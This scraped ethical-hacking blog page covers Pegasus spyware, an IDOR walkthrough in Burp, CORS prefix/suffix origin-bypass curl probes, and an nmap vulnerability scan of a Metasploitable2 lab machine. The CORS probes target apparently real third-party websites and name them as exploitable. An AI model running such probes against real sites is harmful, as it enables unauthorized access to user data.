-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • Pegasus Spyware


     
    Pegasus Spyware

     

    What is Pegasus Spyware?


    Pegasus is a spyware developed by the Israeli cyber arms firm NSO Group that can be covertly installed on mobile phones running most versions of iOS and Android.

    NSO Group was previously owned by American private equity firm Francisco partners, but it was bought back by its founders in 2019. The company states that it provides authorized government with technology that helps them combat terror and crime. 

    Zero click installation that requires no action by the target is not only ability that makes pegasus the super spyware it is. What also makes it unique is the capability of "active collection", which gives attackers the power to "control the information" they want to collect from the targeted device.

    The spyware can steal private data from a phone, sending a target's messages, passwords, contacts, photos, location and more to whoever initiated the surveillance. It can reportedly even turn on the phone's cameras or microphones to create covert recordings.

     

     

    Pegasus Spyware

     

     

     

     

    The transmitted data is encrypted with symmetric encryption AES 128-bit. Even encrypting, extra care is taken to ensure that pegasus uses minimal data, battery, and memory to make sure that the target does not get suspicious.

    Data transmission stops automatically when the battery level is low, or when the target is roaming. when transmission is not possible, pegasus stores the collected data in a hidden and encrypted buffer. under rare ciscumstances when no transmission is possible through safe channes, and attacker can collect urgetnt data through text messages.

     

    Pegasus comes complete with an efficient self-destruct mechanism. Any risk of exposure automatically activates the self-destruct mechanism, which also comes into effect if pegasus does not communicate with its server from an infected device for 60 days or a customized period of time.

    The company does not allow infected phones to travel to the united states. The moment a victim enters the US, pegasus in her device goes into self-destruct mode.

    Pegasus discovered in august 2016 after a failed installation attempt on the iphone of an arab human rights activist Ahmed mansoor led to an investigation revealing details about the spyware, its abilities and the sedcurity vulnerabilities it exploited. News of the spyware caused significant media coverage. It was called the "most sophisitcated" smartphone attack ever.


    On August 23, 2020, according to intelligence obtained by the Israeli newspaper Haaretz, NSO Group sold Pegasus spyware software for hundreds of millions of US dollars to the United Arab Emirates and the other Gulf States, for surveillance of anti-regime activists, journalists, and political leaders from rival nations, with encouragement and mediation by the Israeli government.



    Later, in December 2020, the Al Jazeera investigative show The Tip of the Iceberg, Spy partners, exclusively covered Pegasus and its penetration into the phones of media professionals and activists; and its use by Israel to eavesdrop on both opponents and allies.


    In July 2021, widespread media coverage part of the Project Pegasus revelations along with an in-depth analysis by human rights group Amnesty International uncovered that Pegasus was still being widely used against high-profile targets. It showed that Pegasus was able to infect all modern iOS versions up to the latest release, iOS 14.6, through a zero-click iMessage exploit.



    In late 2019, Facebook initiated a suit against NSO, claiming that Pegasus had been used to intercept the WhatsApp communications of a number of activists, journalists, and bureaucrats in India, leading to accusations that the Indian government was involved.


    Phone numbers of Indian ministers, opposition leaders, ex-election commissioners and journalists were allegedly found on a database of NSO hacking targets by Project Pegasus in 2021. 11 phone numbers associated with a female employee of the Supreme Court of India and her immediate family, who accused the former Chief Justice of India, Ranjan Gogoi, of sexual harassment, are also allegedly found on a databaseindicating possibility of their phones being snooped.


    It was reported that the Indian government used Pegasus to spyon Pakistan Prime Minister Imran Khan and diplomats from Iran, Afghanistan, China, Nepal and Saudi Arabia.


    Pegasus has been used to target and intimidate Mexican journalistsby drug cartels and cartel-entwined government actors. Pegasus software, whose sales are licensed by the government of Israel to foreign governments, helped Saudi Arabia spy on Jamal Kashoggi,who was later killed in Turkey.Pegasus was also used to spy on Jeff Bezos after Mohammed bin Salman, the crown-prince of Saudi Arabia, exchanged messages with him that exploited then-unknown vulnerabilities in WhatsApp.


    A leak of a list of over 50,000 phone numbers believed to have been identified as those of people of interest by clients of NSO since 2016 became available to Paris-based media nonprofit organization Forbidden Stories and Amnesty International.

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • Testing for Insecure Direct Object References


     




    Insecure Direct Object References

     

    Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.


    Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

     


    How to Test



    • Map out all locations in the application where user input is used to reference objects directly.
    •  
    • The best way to test for direct object references would be by having at least two or more users to cover different own objects and functions.
    •  
    • The value of a parameter is used directly to retrieve a database record.
    • The value of a parameter is used directly to perform an operation in the system.
    •  
    • The value of a parameter is used directly to retrieve a file system resource.
    •  
    • The value of a parameter is used directly to access application functionality.

     

     

    This is a vulnerable web page where you can discover a IDOR vulnerability and learn something new techniques

     

    CAUTION: This is an intentionally broken web application. Please do NOT use any real information

     

     





    In this URL, as you can see here. Here the number has been used for any one profile and here we can consider it as an object.







    Let's intercept this page via burp suite and sent to the intruder tab.






    The number we have taken as a object will be add mark...so lets hightlight the number and click on add button.











    Now what we are doing!! so lets change the payload type thats means we select a numbers in Pyload set and after doing, we will add numbers from 1 to 100 and whatever as you want. okay!!


    So in Payload Options[Numbers] we will add a number from 1 and for to 1000 and we will leave the other options as it as.


    Finally Click on start attack.






    So as you can there's response are 200 thats mean OK!!








    We can see that after changing this objective value, the profile is getting changed due to which we are able to visit the profile of other user without login.






    Click here for more information

     

     

     

     

     

     

     

     

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



  • Exploitation of CORS Prefix-Suffix Match

     

    Exploitation of CORS Prefix-Suffix Match

     

     

    In this blog we are going to see exploitation of CORS using prefix patch time.

     

    What is CORS? 

     

    Cross-Origin Resource Sharing

    W3C working draft that defines how the browser and server must communicate when accessing sources across origins. CORS Cross Origin Resource Sharing Vulnerability on Live Website

    Implemented via HTTP headers that servers set and browsers enforce.

     


    Prefix Time


    So the target URL is on hakonindia.org and here in we are going to add evil.com at the end of this website so this attack that is known as prefix match exploitation of CORS.

    So here in while testing, I noticed that whenever I try to supply any arbitary origin and have "hakonindia", it does not take it, so if I type origin attacker.com and send it it does not take it why because the website developer has kept a condition at in origin "hakonindia" should come so when I tried "evilhakonindia.org" it did not allow me so basically the condition is like that that anything you cannot be added before the hostname for the website name if i do any modifications before the hostname that is "hakonindia.org" it does not take that and just block set but then I tried this condition in which I added the attacker.com or evil.com at the end and I was able to successfully achieved cause onto this website as this court deflected into the response as it is so what does this mean any attacker can purchase this website which is evil.com and make a subdomain and again a subdomain of that and do a successful exploitation of CORS on this website.

     



    Here, attacker purchase this domain evil.com and make a subdomain like org.evil.com or hakonindia.org.evil.com


    {
      "url":"http://www.hackonindia.org/wp-json",
      "credentials":"true"
      "type":"prefix_match",
      "origin":"http://www.hackonindia.org.evil.com",
      "status_code":200
    
    } 
    
    





    here i am going to search curl and the target name is "https://www.hakonindia.org/wp-json" and (-I) because i want to see only response header.



      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I 
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Link: ; rel="https://api.w.org/"
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
      




    As you can see i am able to see the reponse header and now i add attacker.com into the origin.



    -H which means header and the header we are going to the gives origin hakonindia.org.evil.com and i will hit enter so as you can see this it is getting reflected as we gave into the request it is getting reflected into the response as it as. So as you can see allow access control origin hakonindia.org.evil.com and in access control allow credentials giving true which means this is the best case we have got, we are able to exploit this.





      
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "http://www.hakonindia.org/wp-json" -I -H Origin:hakonindia.org.evil.com
    HTTP/1.1 200 OK
    Server: openresty
    Date: Mon, 05 Jul 2021 09:54:12 GMT
    Content-Type: text/html
    Content-Length: 2522
    Last-Modified: Wed, 30 Jun 2021 20:13:11 GMT
    ETag: "60dcd057-9da"
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h9TJjf2T0dlkB77Ad+JYCrUtON4BPa50Qc8EQUp5to4dVGLqj43LWzNK8QSe/JUO6hQ9MyNONTDY6tVQgatLTA
    Set-Cookie: system=PW;Path=/;Max-Age=86400;
    Set-Cookie: caf_ipaddr=47.29.121.166;Path=/;Max-Age=86400;
    Set-Cookie: country=IN;Path=/;Max-Age=86400;
    Set-Cookie: city="Patna";Path=/;Max-Age=86400;
    Set-Cookie: traffic_target=reseller;Path=/;Max-Age=86400;
    Access-Control-Allow-Origin: http://hakonindia.org.evil.com
    Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    Access-Control-Allow-Credentials: true
    Vary: Origin, User-Agent
    Accept-Ranges: bytes
    Via: 1.1 google
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
      
      



     

    Suffix Time

     

    The type suffix match, so in here as you can the URL and target is this "https:ukrainianpeople.us/wp-json/".


    Now if you look closely in the origin what i am going to supply is "evilukrainianpeople.us" because guys some websites for block trusting arbitrary attackers website that is evil.com. How do they do it basically the developer put the logic that any origin which is coming any request which is coming with any origin to the server should contain the hostname which is the the host wesbites name is "ukrainianpeople" but it does not check if the attacker is adding something into the suffix with the host name of the website and sending something so as you can see here you are able to bypass this condition on the website where the website was checking that ukrainianpeople should come into the origin by adding evil with that now when will send this evilukrainianeople.us that us the website is going to trust this why it because the condition only checks that ukrainianpeople.us comes into the origin which is satisfied and successfully this will get reflected in the response now the attacker can quickly go and purchase this domain which is evilukrainianpeople.us and then he can to the further cost exploitation attack.



      
      
    {
      "url":"https://ukrainianpeople.us/wp-json",
      "credentials":"true"
      "type":"prefix_match",
      "origin":"https://evilukrainianpeople.us",
      "status_code":200
    
    } 
    
      


      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I                                                                                  1 ⨯
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:19:56 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:19:56 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
    
    
      




    I am going to start with curl and our target is "https://ukrainianpeople.us/wp-json" and (-I) and i want to see only response header. Now as you can see these our headers, they are come from webservers. Now we are add our arbitary origin that is attacker.com and we will make the website trust us. so (-H) means headers. The headers name is origin and trust "evilukrainianpeople.us".




      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ curl "https://ukrainianpeople.us/wp-json" -I -H Origin:evilukrainianpeople.us        
    HTTP/2 200 
    date: Mon, 05 Jul 2021 10:20:54 GMT
    server: Apache
    x-powered-by: PHP/7.2.34
    vary: Accept-Encoding,Cookie,Origin,User-Agent
    x-robots-tag: noindex
    link: ; rel="https://api.w.org/"
    x-content-type-options: nosniff
    access-control-expose-headers: X-WP-Total, X-WP-TotalPages
    access-control-allow-headers: Authorization, Content-Type
    allow: GET
    access-control-allow-origin: http://evilukrainianpeople.us
    access-control-allow-methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
    access-control-allow-credentials: true
    cache-control: max-age=172800
    expires: Wed, 07 Jul 2021 10:20:54 GMT
    content-type: application/json; charset=UTF-8
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
      




    And as you can access-control-allow-origin and our origin has reflected and the credentails are also true. 






    Brought to you by Hacking Truth


     

     

    CORS Mitigation


    1) SOP! Same Origin Policy
    2) Do not trust any aribitary origin and communication with it!




    what are the mitigations for CORS.

    1) So the first and the best mitigations for CORS is SOP the same origin policy. so this policy means this policy means that the web site or the web application should not transfer any kind of data to any other web application so it should only communicate and transfer the data with the same origin for same website.


    2) Do not trust any arbitrary origin and communicate with that if any web application is getting any origin header as a request that should not trust that arbitrary header and give out sensitive information basically whenever attacker tries to do a reflective origin based CORS the server should discard that I should not trusted and should not give out the response to that server. Secondly if a suffix or prefix based cause exploitation is performed the server should do proper validation not just limited to checking the hostname into the origin we have already seen if the server is misconfigured and just check for the name into the origin header and takes decisions based on that which is dangerous can lead to CORS exploitation. So do not trust any arbitrary origin and communicate with it is the best mitigation for CORS. so I hope you understood the mitigation for CORS.




    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal


  • Vulnerability Assessment & Penetration Testing Report Metasploitable2


    Vulnerability Assessment & Penetration Testing Report Metasploitable2



    Vulnerability Assessment & Penetration Testing Report on Metasploitable2


    Vapt or Vulnerability Assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, application and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.


    Penetration testing (or pentesting) is a simulated cyber attack where professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.

    It's like in the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It’s a simulated cyber attack where the pentester or ethical hacker uses the tools and techniques available to malicious hackers.



    Life Cycle of Penetration Testing:

    1] Reconnaissance

    2] Scanning

    3] Exploitation

    4] Maintaining Access



    Reconnaissance


    First, we denotes the work of information gathering before any real attacks are planned (like Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But here we have a know target, a Metasploitable2 machine connected to same network as on us to find the target machine we will run an Nmap scan



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Here, as you can see above the command line and this is IP range that i writter there because we want to know OS details of every system connected to the network so that we can find our target machine. So first we need to sapearate out the live IP address (livehosts.txt) so we save the above result in a text file and then filter the IP address using the command.

    and then see the below comand cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt.

    Here, We have filtered the file as well as saved the output in a new file and finally our result is in front of you.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat ip.txt                                              
    192.168.43.1
    192.168.43.120
    192.168.43.152
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    


    Now what we are doing now!! so, now we have to check which one of them is a metasploitable2 machine so we will run an script which will detect the OS of all the live IP's



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Our output is here :-)



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat osdetails.txt                                       
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
    Nmap scan report for 192.168.43.1
    Host is up (0.0026s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  dnsmasq 2.51
    MAC Address: 2A:09:08:63:43:8D (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
    OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
    OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
    OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
    OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
    OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
    OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
    OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
    OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
    OS:%T=40%CD=S)
    
    Network Distance: 1 hop
    
    Nmap scan report for 192.168.43.120
    Host is up (0.00071s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec?
    513/tcp  open  login
    514/tcp  open  shell?
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
    SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
    SF:ulJaiswal\)\n");
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 192.168.43.152
    Host is up (0.000089s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6.32
    OS details: Linux 2.6.32
    Network Distance: 0 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    
    
    


    So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP fingerprint, Host, OS details, MAC address, Network distance etc.



    Vulnerability Scanning


    In this scanning part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerabilities in the system.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    
    
    

    The output is here - 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat vuln.txt              
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
    Nmap scan report for 192.168.43.120
    Host is up (0.00014s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |     IDs:  BID:48539  CVE:CVE-2011-2523
    |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    |     Disclosure date: 2011-07-03
    |     Exploit results:
    |       Shell command: id
    |       Results: uid=0(root) gid=0(root)
    |     References:
    |       https://www.securityfocus.com/bid/48539
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
    |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    |_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    |_sslv2-drown: 
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    | smtp-vuln-cve2010-4344: 
    |_  The SMTP server is not Exim: NOT VULNERABLE
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use anonymous
    |       Diffie-Hellman key exchange only provide protection against passive
    |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
    |       which could completely compromise the confidentiality and integrity
    |       of any data exchanged over the resulting session.
    |     Check results:
    |       ANONYMOUS DH GROUP 1
    |             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.ietf.org/rfc/rfc2246.txt
    |   
    |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
    |     State: VULNERABLE
    |     IDs:  BID:74733  CVE:CVE-2015-4000
    |       The Transport Layer Security (TLS) protocol contains a flaw that is
    |       triggered when handling Diffie-Hellman key exchanges defined with
    |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
    |       to downgrade the security of a TLS session to 512-bit export-grade
    |       cryptography, which is significantly weaker, allowing the attacker
    |       to more easily break the encryption and monitor or tamper with
    |       the encrypted stream.
    |     Disclosure date: 2015-5-19
    |     Check results:
    |       EXPORT-GRADE DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.securityfocus.com/bid/74733
    |       https://weakdh.org
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
    |   
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: postfix builtin
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: ERROR: Script execution failed (use -d to debug)
    53/tcp   open  domain
    80/tcp   open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.43.120:80/dvwa/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
    |     Form id: id-bad-cred-tr
    |     Form action: index.php?page=register.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
    |     Form id: iddnslookupform
    |     Form action: index.php?page=dns-lookup.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
    |     Form id: idpollform
    |_    Form action: index.php
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /tikiwiki/: Tikiwiki
